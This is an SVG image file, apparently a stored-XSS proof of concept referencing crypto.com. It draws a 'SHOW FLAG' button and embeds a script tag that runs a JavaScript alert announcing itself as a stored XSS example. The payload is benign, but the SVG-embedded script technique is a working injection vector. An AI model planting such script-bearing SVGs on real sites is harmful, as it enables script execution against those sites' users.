File size: 453 Bytes
23e57b8 |
1 2 3 4 5 6 7 8 9 10 11 |
<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg">
<a href="#" id="showFlagLink">
<rect x="50" y="50" width="200" height="60" rx="10" ry="10" fill="#007BFF" />
<text x="150" y="90" font-family="Arial" font-size="20" fill="white" text-anchor="middle">SHOW FLAG</text>
</a>
<script type="text/javascript">
alert("This is an example of a stored XSS attack in an SVG image")
</script>
<h1>HELLO CRYPTO.COM</h1>
</svg>
|